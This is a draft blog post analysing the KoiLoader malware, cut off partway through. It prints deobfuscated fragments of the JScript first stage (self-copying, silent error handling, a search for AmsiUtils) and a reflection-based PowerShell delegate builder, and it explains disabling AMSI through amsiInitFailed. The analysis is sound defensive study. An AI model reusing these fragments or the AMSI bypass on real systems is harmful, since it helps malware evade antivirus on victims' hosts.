<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="dark">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="KoiLoader - Malware Analysis Walkthrough" />
<meta property="og:locale" content="en" />
<meta name="description" content="This is still kind of a draft version of the post. However I wanted to post it so I can show snippet of what I’m doing. The markdown composition as well as the finall template of the report is also a work in progress ;D" />
<meta property="og:description" content="This is still kind of a draft version of the post. However I wanted to post it so I can show snippet of what I’m doing. The markdown composition as well as the finall template of the report is also a work in progress ;D" />
<link rel="canonical" href="http://localhost:4000/posts/KoiLoader/" />
<meta property="og:url" content="http://localhost:4000/posts/KoiLoader/" />
<meta property="og:site_name" content="Qba01" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-08-01T00:00:00+02:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="KoiLoader - Malware Analysis Walkthrough" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-08-01T00:00:00+02:00","datePublished":"2025-08-01T00:00:00+02:00","description":"This is still kind of a draft version of the post. However I wanted to post it so I can show snippet of what I’m doing. The markdown composition as well as the finall template of the report is also a work in progress ;D","headline":"KoiLoader - Malware Analysis Walkthrough","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/posts/KoiLoader/"},"url":"http://localhost:4000/posts/KoiLoader/"}</script>
<!-- End Jekyll SEO tag -->


  <title>KoiLoader - Malware Analysis Walkthrough | Qba01
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="Qba01">
<meta name="application-name" content="Qba01">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.6/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/favicons/web-app-manifest-512x512.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">Qba01</a>
    <p class="site-subtitle fst-italic mb-0">I like RE and malware stuff</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    

    
      

      
        <a
          href="https://github.com/Qba01"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" class="flex-shrink-0" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/">Home</a>
            </span>

          
        
          
        
          
            
              <span>KoiLoader - Malware Analysis Walkthrough</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link" aria-label="Sidebar">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link" aria-label="Search">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>KoiLoader - Malware Analysis Walkthrough</h1>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1753999200"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Aug  1, 2025
</time>

      </span>

      <!-- lastmod date -->
      

      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              <a href="https://github.com/Qba01">Qba01</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="1314 words"
>
  <em>7 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">KoiLoader - Malware Analysis Walkthrough</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">KoiLoader - Malware Analysis Walkthrough</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <blockquote class="prompt-info">
  <p>This is still kind of a draft version of the post. However I wanted to post it so I can show snippet of what I’m doing. The markdown composition as well as the finall template of the report is also a work in progress ;D</p>
</blockquote>

<h3 id="threat-overview"><span class="me-2">Threat Overview</span><a href="#threat-overview" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<ul>
  <li><strong>Threat Name</strong>: KoiLoader</li>
  <li>File Format: #JS, #Powershell, #EXE</li>
  <li><strong>First Stage</strong>:
    <ul>
      <li>sourceFile: 21bc8b52d903de7f90c11d46e08a215fa88afab2f1f932ff6b56307a14402014.js
        <ul>
          <li>SHA256: 21bc8b52d903de7f90c11d46e08a215fa88afab2f1f932ff6b56307a14402014</li>
        </ul>
      </li>
    </ul>
  </li>
  <li><strong>Second Stage</strong>:
    <ul>
      <li>File: homalogonatous65K.php
        <ul>
          <li>SHA256: C6D433EB10BCD8CF38D3E788D5A7221122C81A824B847073480551FA7D55748E</li>
          <li>File: cheekpieceGAR.ps1</li>
          <li>SHA256: 9E2F3AFE2363D473D0EC9C711B55FA6413A3BA2139F8207097C23F908E39EC4</li>
        </ul>
      </li>
    </ul>
  </li>
  <li><strong>Thirds Stage</strong>:
    <ul>
      <li>File: cummersMG.exe</li>
      <li>SHA256: D1F32BE6A9D1BFDC0489D06224B16D99AAA641D9E7DC6FAAD142BDE79EB09E1E</li>
    </ul>
  </li>
  <li><strong>Observations</strong>
    <ul>
      <li>Behavior: #todo</li>
      <li>C2 Communication: #todo</li>
      <li>Persistence Mechanisms: #todo</li>
    </ul>
  </li>
  <li><strong>Attack Vector</strong>:
    <ul>
      <li>Entry Point: #todo</li>
      <li>Exploited Vulnerabilities: #todo</li>
    </ul>
  </li>
  <li><strong>Indicators of Compromise (IoCs)</strong>: #todo</li>
</ul>

<h3 id="walkthrough"><span class="me-2">Walkthrough</span><a href="#walkthrough" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<h4 id="initial-file"><span class="me-2">Initial file</span><a href="#initial-file" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>Short simply obfuscated JS file. We have Powershell commands also to finalize the first stage of attack and download rest of the payload.</p>

<div class="language-javascript highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="kd">var</span> <span class="nx">w1</span><span class="o">=</span><span class="dl">"</span><span class="s2">WSc</span><span class="dl">"</span><span class="p">,</span><span class="nx">w2</span><span class="o">=</span><span class="dl">"</span><span class="s2">riPt</span><span class="dl">"</span><span class="p">,</span><span class="nx">w4</span><span class="o">=</span><span class="dl">"</span><span class="s2">eLl</span><span class="dl">"</span>
<span class="kd">var</span> <span class="nx">wsh</span><span class="o">=</span><span class="nx">w1</span><span class="o">+</span><span class="nx">w2</span><span class="o">+</span><span class="dl">"</span><span class="s2">.sH</span><span class="dl">"</span><span class="o">+</span><span class="nx">w4</span>
<span class="kd">var</span> <span class="nx">bbj</span><span class="o">=</span><span class="k">new</span> <span class="nc">ActiveXObject</span><span class="p">(</span><span class="nx">wsh</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>
<p>Script uses outdated <code class="language-plaintext highlighter-rouge">ActiveXObject</code><sup id="fnref:1"><a href="#fn:1" class="footnote" rel="footnote" role="doc-noteref">1</a></sup>, it’s an insecure and deprecated component of older versions of InternetExplorer, now this technology is replaced by APIs. So this malware is really limited in terms of targets which can be affected. But some legacy systems may use IE and have weaker security.  Malware dedicated for Windows hosts.</p>

<p>Interestingly the code checks if the system is 32 or 64 bit.</p>
<pre><code class="language-Powershell">GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth==64?"SysWOW64":"System32"
</code></pre>

<p>Than the script names itself <code class="language-plaintext highlighter-rouge">rMachineGuidr.js</code> and tries to copy itself into <code class="language-plaintext highlighter-rouge">%programdata%</code> of the user. Also in case in which this instructions might fail, the <code class="language-plaintext highlighter-rouge">catch(e) {}</code> is supposed make this attempt silent to not raise unnecessary alerts.</p>
<div class="language-javascript highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="kd">var</span> <span class="nx">agn</span><span class="o">=</span><span class="dl">'</span><span class="s1">r</span><span class="dl">'</span><span class="o">+</span><span class="nx">bbj</span><span class="p">.</span><span class="nc">RegRead</span><span class="p">(</span><span class="dl">'</span><span class="s1">HKEY_LOCAL_MACHINE</span><span class="se">\\</span><span class="s1">SOFTWARE</span><span class="se">\\</span><span class="s1">Microsoft</span><span class="se">\\</span><span class="s1">Cryptography</span><span class="se">\\</span><span class="s1">MachineGuid</span><span class="dl">'</span><span class="p">)</span><span class="o">+</span><span class="dl">'</span><span class="s1">r.js</span><span class="dl">'</span>
<span class="k">if </span><span class="p">(</span><span class="nx">WScript</span><span class="p">.</span><span class="nx">ScriptName</span> <span class="o">!=</span> <span class="nx">agn</span><span class="p">)</span> <span class="p">{</span>
	<span class="kd">var</span> <span class="nx">fs5</span><span class="o">=</span><span class="dl">"</span><span class="s2">yFi</span><span class="dl">"</span>
	<span class="k">try</span> <span class="p">{</span>
	<span class="nx">fso</span><span class="p">[</span><span class="dl">"</span><span class="s2">Cop</span><span class="dl">"</span><span class="o">+</span><span class="nx">fs5</span><span class="o">+</span><span class="dl">"</span><span class="s2">le</span><span class="dl">"</span><span class="p">](</span><span class="nx">WScript</span><span class="p">.</span><span class="nx">ScriptFullName</span><span class="p">,</span> <span class="nx">bbj</span><span class="p">.</span><span class="nc">ExpandEnvironmentStrings</span><span class="p">(</span><span class="dl">"</span><span class="s2">%programdata%</span><span class="dl">"</span><span class="p">)</span><span class="o">+</span><span class="dl">"</span><span class="se">\\</span><span class="dl">"</span><span class="o">+</span><span class="nx">agn</span><span class="p">)</span>
	<span class="p">}</span> <span class="k">catch </span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{}</span>
<span class="p">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p>File runs itself and tries to create a copy in temp folder under name “7zMJF008IA8P”.
Than deletes itself, checks if the task is accomplished and if so it runs another command to download second stage with high privileges on the host.</p>
<div class="language-javascript highlighter-rouge"><div class="code-header">
        <span data-label-text="JavaScript"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre><span class="kd">var</span> <span class="nx">mtx_file</span> <span class="o">=</span> <span class="nx">bbj</span><span class="p">.</span><span class="nc">ExpandEnvironmentStrings</span><span class="p">(</span><span class="dl">"</span><span class="s2">%tem</span><span class="dl">"</span><span class="o">+</span><span class="dl">"</span><span class="s2">p%</span><span class="dl">"</span><span class="p">)</span><span class="o">+</span><span class="dl">"</span><span class="se">\\</span><span class="dl">"</span><span class="o">+</span><span class="nx">mtx_name</span>
<span class="kd">var</span> <span class="nx">fs1</span><span class="o">=</span><span class="dl">"</span><span class="s2">leteFi</span><span class="dl">"</span>
<span class="kd">var</span> <span class="nx">fs2</span><span class="o">=</span><span class="dl">"</span><span class="s2">leExis</span><span class="dl">"</span>
<span class="k">try</span> <span class="p">{</span>
	<span class="nx">fso</span><span class="p">[</span><span class="dl">"</span><span class="s2">De</span><span class="dl">"</span><span class="o">+</span><span class="nx">fs1</span><span class="o">+</span><span class="dl">"</span><span class="s2">le</span><span class="dl">"</span><span class="p">](</span><span class="nx">mtx_file</span><span class="p">)</span>
<span class="p">}</span> <span class="k">catch </span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{}</span>
<span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">fso</span><span class="p">[</span><span class="dl">"</span><span class="s2">Fi</span><span class="dl">"</span><span class="o">+</span><span class="nx">fs2</span><span class="o">+</span><span class="dl">"</span><span class="s2">ts</span><span class="dl">"</span><span class="p">](</span><span class="nx">mtx_file</span><span class="p">))</span>
<span class="p">{</span>
</pre></td></tr></tbody></table></code></div></div>

<p>The last commands in this stage of the attack start another powershell. Returns list of types of Reference assemblies<sup id="fnref:2"><a href="#fn:2" class="footnote" rel="footnote" role="doc-noteref">2</a></sup> then iterates throught it and checks for matches. <code class="language-plaintext highlighter-rouge">*a?s?U*ls</code>, asterisk - any number of characters, ? - single character.</p>
<pre><code class="language-{Powershell}">$aR2Oew=[Ref].Assembly.GetTypes()
Foreach($llin in $aR2Oew) {if ($llin.Name -like '*a?s?U*ls') {echo $llin}};
</code></pre>

<p><a href="/imges/2025-08-01-KoiLoader/Pasted image 20250725231237.png" class="popup img-link shimmer"><img src="/imges/2025-08-01-KoiLoader/Pasted image 20250725231237.png" alt="Desktop View" loading="lazy"></a></p>

<p>AmsiUtils stands for <code class="language-plaintext highlighter-rouge">Anti-malware Scan Interface</code> integrated with Microsoft Defender Antivirus. Next the new enviroment is created with the path to the file/directory <code class="language-plaintext highlighter-rouge">7zMJF008IA8P</code>. And lastly it downloads 2 files from compromised website <code class="language-plaintext highlighter-rouge">homalogonatous65K.php</code> and <code class="language-plaintext highlighter-rouge">cheekpieceGAR.ps1</code>.</p>

<h4 id="homalogonatous65kphp"><span class="me-2">homalogonatous65K.php</span><a href="#homalogonatous65kphp" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>SHA256: C6D433EB10BCD8CF38D3E788D5A7221122C81A824B847073480551FA7D55748E</p>

<p>It’s a Powershell in a trenchcoat of PHP.
Content of this file is each time partially generated which guarantees some uniqnes.
It’s a 2-liner, first the script does a check and return True or False. It could be some failsafe mechanism.</p>
<pre><code class="language-{Powershell}">PS C:\Windows\system32&gt; $vl1 = ("zrSszQb1JW2YVwZXPF153HT4IlqG4MCetbtvVwZXPF153HT4gxDA1Tk0KDtKVwZXPF153HT4dULx1OVJ9MZEVwZXPF153HT4iltcNnX3kkDl" -match "VwZXPF153HT4");
echo $vl1
True
</code></pre>

<p>Oh nevermind it’s not a failsafe I jumped to this conclusion to early. It’s just a piece of code returning true, which is needed later. 
Together with variable from the initial part of attack this script disables the Amsi by corrupting the internal state <code class="language-plaintext highlighter-rouge">amsiInitFailed</code> set to true, which may lead to module thinking it’s broken/not working currently.</p>
<h4 id="cheekpiecegarps1"><span class="me-2">cheekpieceGAR.ps1</span><a href="#cheekpiecegarps1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>SHA256: E9E2F3AFE2363D473D0EC9C711B55FA6413A3BA2139F8207097C23F908E39EC4</p>

<p>Parameter for IWR -<code class="language-plaintext highlighter-rouge">UseBasicParsing</code>, it’s deprecated since Powershell 6.0. Also it explains the mysterious <code class="language-plaintext highlighter-rouge">-usebas</code> which was shortcut for that.</p>
<h5 id="function-gdt"><span class="me-2">Function GDT</span><a href="#function-gdt" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h5>
<div class="language-powershell highlighter-rouge"><div class="code-header">
        <span data-label-text="Powershell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre><span class="nv">$DA</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">New-Object</span><span class="w"> </span><span class="nx">System.Reflection.AssemblyName</span><span class="p">(</span><span class="s1">'RD'</span><span class="p">)</span><span class="w">
</span><span class="nv">$AB</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">AppDomain</span><span class="p">]::</span><span class="n">CurrentDomain.DefineDynamicAssembly</span><span class="p">(</span><span class="nv">$DA</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">System.Reflection.Emit.AssemblyBuilderAccess</span><span class="p">]::</span><span class="n">Run</span><span class="p">)</span><span class="w">
</span><span class="nv">$MB</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$AB</span><span class="o">.</span><span class="nf">DefineDynamicModule</span><span class="p">(</span><span class="s1">'IMM'</span><span class="p">,</span><span class="w"> </span><span class="bp">$false</span><span class="p">)</span><span class="w">
</span><span class="nv">$TB</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$MB</span><span class="o">.</span><span class="nf">DefineType</span><span class="p">(</span><span class="s1">'MDT'</span><span class="p">,</span><span class="w"> </span><span class="s1">'Class, Public, Sealed, AnsiClass, AutoClass'</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">System.MulticastDelegate</span><span class="p">])</span><span class="w">
</span><span class="nv">$CB</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$TB</span><span class="o">.</span><span class="nf">DefineConstructor</span><span class="p">(</span><span class="s1">'RTSpecialName, HideBySig, Public'</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">System.Reflection.CallingConventions</span><span class="p">]::</span><span class="nx">Standard</span><span class="p">,</span><span class="w"> </span><span class="nv">$Parameters</span><span class="p">)</span><span class="w">
</span><span class="nv">$CB</span><span class="o">.</span><span class="nf">SetImplementationFlags</span><span class="p">(</span><span class="s1">'Runtime, Managed'</span><span class="p">)</span><span class="w">
</span><span class="nv">$MB</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$TB</span><span class="o">.</span><span class="nf">DefineMethod</span><span class="p">(</span><span class="s1">'Invoke'</span><span class="p">,</span><span class="w"> </span><span class="s1">'Public, HideBySig, NewSlot, Virtual'</span><span class="p">,</span><span class="w"> </span><span class="nv">$ReturnType</span><span class="p">,</span><span class="w"> </span><span class="nv">$Parameters</span><span class="p">)</span><span class="w">
</span><span class="nv">$MB</span><span class="o">.</span><span class="nf">SetImplementationFlags</span><span class="p">(</span><span class="s1">'Runtime, Managed'</span><span class="p">)</span><span class="w">
</span></pre></td></tr></tbody></table></code></div></div>
<p>Step by step:</p>
<ol>
  <li>This ps1 creates an assemly named <code class="language-plaintext highlighter-rouge">RD</code></li>
  <li>Creates module <code class="language-plaintext highlighter-rouge">IMM</code> with <code class="language-plaintext highlighter-rouge">$false</code> which, apparently does nothing? Or maybe in older version of Powershell it has some purpose. Currently output of this snippet of function looks like this.</li>
</ol>

<div class="language-powershell highlighter-rouge"><div class="code-header">
        <span data-label-text="Powershell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre><span class="n">PS</span><span class="w"> </span><span class="nx">C:\Windows\system32</span><span class="err">&gt;</span><span class="w"> </span><span class="nv">$DA</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">New-Object</span><span class="w"> </span><span class="nx">System.Reflection.AssemblyName</span><span class="p">(</span><span class="s1">'RD'</span><span class="p">)</span><span class="w">
</span><span class="nv">$AB</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">[</span><span class="n">AppDomain</span><span class="p">]::</span><span class="n">CurrentDomain.DefineDynamicAssembly</span><span class="p">(</span><span class="nv">$DA</span><span class="p">,</span><span class="w"> </span><span class="p">[</span><span class="n">System.Reflection.Emit.AssemblyBuilderAccess</span><span class="p">]::</span><span class="n">Run</span><span class="p">)</span><span class="w">
</span><span class="nv">$MB</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nv">$AB</span><span class="o">.</span><span class="nf">DefineDynamicModule</span><span class="p">(</span><span class="s1">'IMM'</span><span class="p">,</span><span class="w"> </span><span class="bp">$false</span><span class="p">)</span><span class="w">
</span><span class="n">echo</span><span class="w"> </span><span class="nv">$MB</span><span class="w">


</span><span class="n">FullyQualifiedName</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">IMM</span><span class="w">
</span><span class="n">MDStreamVersion</span><span class="w">    </span><span class="p">:</span><span class="w"> </span><span class="nx">131072</span><span class="w">
</span><span class="n">ModuleVersionId</span><span class="w">    </span><span class="p">:</span><span class="w"> </span><span class="nx">174cd321-1e72-4051-8915-9ba4d535aa9e</span><span class="w">
</span><span class="n">MetadataToken</span><span class="w">      </span><span class="p">:</span><span class="w"> </span><span class="nx">1</span><span class="w">
</span><span class="n">ScopeName</span><span class="w">          </span><span class="p">:</span><span class="w"> </span><span class="nx">IMM</span><span class="w">
</span><span class="n">Name</span><span class="w">               </span><span class="p">:</span><span class="w"> </span><span class="err">&lt;</span><span class="nx">In</span><span class="w"> </span><span class="nx">Memory</span><span class="w"> </span><span class="nx">Module</span><span class="err">&gt;</span><span class="w">
